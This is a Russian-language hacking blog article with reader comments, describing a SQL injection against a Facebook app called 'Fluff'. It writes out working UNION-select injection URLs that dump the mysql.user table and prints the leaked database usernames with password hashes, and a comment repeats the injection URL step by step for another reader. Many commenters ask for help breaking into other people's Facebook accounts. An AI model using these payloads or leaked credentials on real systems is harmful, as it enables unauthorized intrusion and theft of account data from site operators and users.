Новый год. Поздравления, брызги шампанского, догорающие бенгальские огни. Казалось бы, что еще нужно для счастья? Несомненно, сокрушительный взлом – новогодний хек крупнейшего проекта. Я выбрал цель – facebook.com – крупнейшую в мире соцсеть. А вот осуществил ли я взлом этого ресурса под бой новогодних курантов, ты узнаешь, прочитав эту статью.
История Facebook.com берет свое начало в феврале 2004 года, когда девятнадцатилетний студент Гарварда Марк Закерберг решил сделать онлайн-справочник студентов своего вузa с их фотографиями и данными в Сети. В большинстве колледжей и институтов такой справочник носит название «face book». Поначалу пользоваться его творением могли только студенты Гарварда, сайт располагался по адресу Thefacebook.com. Сейчас же Facebook.com доступен для всех и каждого. По официальной статистике, на июль 2007 года Facebook был седьмым по посещаемости сайтом в США и самым популярным ресурсом для студентов – 34 миллиона зарегистрированных пользователей по всему миру. Даже такие гиганты, как Microsoft, охотно сотрудничают с такой огромной рекламной площадкой! В октябре 2007 года также стало известно, что Microsoft приобретает 1,6% акций Facebook за 240 миллионов долларов. После чего был заключен контракт, по которому софтверный гигант будет размещать свои рекламные баннеры на сайте до 2011 года. Какие уязвимости нашли в этом адовом проекте русские хакеры — ты сейчас узнаешь!
(happy) Crab, Chickee, Puppog — вы мои друзья!
В силу определенных причин мое внимание привлек довольно шуточный application-проект Flufffriends.com. Узел использовался в качестве редиректа на развлекательное приложение «Fluff» по следующей ссылке: apps.facebook.com/fluff/ffriends_splash.php. Как выяснилось, такой байды на ресурсе насчитывалось сотнями, а то и тысячами. Все началось с простого – я решил найти друзей у этого чудовища.
http://apps.facebook.com/fluff/fluffbook.php?id=654626570
Подставив аномальный параметр «id=’111111111», я получил ответ от ресурса, который намекал на то, что он все-таки обратился к базе, но ничего дельного не нашел. Тогда было решено выполнить специальный запрос к базе, попытавшись подобрать количество колонок:
http://apps.facebook.com/fluff/art.php?id=654329372+and+1=-1 +union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9—
Бинго! Можно действовать дальше:
http://apps.facebook.com/fluff/fluffbook.php?id=654626570+and+1=2 +union+ Select+all+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),4,5,6,null,8,9,10,11,12,13,14,15,16, concat(user,%200x3a,%20password),18,19,20,21+FROM+mysql.user+limit+1,1 (играемся со значением лимита)
А вот и заветные пользователи!
root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
muu:*74A45B921A1A918B18AE9B137396E5A67E006262
monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
Теги: Facebook, sql-injection, взлом.
А вы можете помочь взломать мне страницу одного человека на Facebook?
Э, не. Здесь мы только даём информацию в образовательных целях. Практическое же её использование (с учётом 272 статьи УК РФ) сугубо личное дело каждого читателя.
Мне взламывать ничего не надо, никаких паролей…Просто смотреть информацию, если ограничен доступ…Как на «вконтакте» там фотки можно смотреть.
Привет,а что надо вводить?
Сначала в арр заходим этот, потом вводим
http://apps.facebook.com/fluff/fluffbook.php?id=654626570+and+1=2 +union+ Select+all+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),4,5,6,null,8,9,10,11,12,13,14,15,16, concat(user,%200x3a,%20password),18,19,20,21+FROM+mysql.user+limit+1,1
Или как-то по другому, а то я недоехал
Прежде всего желательно посмотреть на дату публикации, затем сравнить с текущей и, убедившись что Фейсбук ещё работает, сделать вывод о наличии уязвимости в настоящее время.
Помогите пожалуйста.Я поставила и на маил и на фейс одинаковый пароль;и забыла.К черту маил меня больше фейс интересует.Как же мне взломать старый пароль фейса?Плииз…помоите очунь нужно!!!!
Вы можете помочь зайти мне на чужую страничку на фейсбуке? Знаю только электронный адрес, без пароля этой страницы.
см. комментарий #2 + статью 137 УК РФ.
Также рекомендую обратить внимание на http://goo.gl/Dd7AD
подскажите
как я могу найти того кто взломaл мой faecebook
Мне очень надо взламать страницу !! так как человек взял мои фото мое имя и портит мою репутацию и жизнь через фальшивую страницу!! так же требует деньги у людей!!! Мне очень нужна помощь! я бы в милицую обратилось но говорят ничего не сделают так как человек который это делает живет в другой стране
pomogite mne vzlomat odin facebook… plz…
Pomogite vzlomat!!!!
мне нужно взломать одного человека срочно(((((…..на фейсбуке аккаунт,но есть одно НО…он скрыл свою почту(что мне делать..помогите…
Priwet, pomogite mne pozhalujsta wzlomatj facebook odnogo 4eloweka, u menja estj toljko e-Mail. K sozhaleniju ja sama ne mogu i nekogo ne znaju kto by smog. Delo w tom, 4to etot 4elowek menja o4enj siljno obidel i ja ho4u posmotretj 4to on pro menja pishet i 4to on woobshe pishet…..suka ljubowj w obshem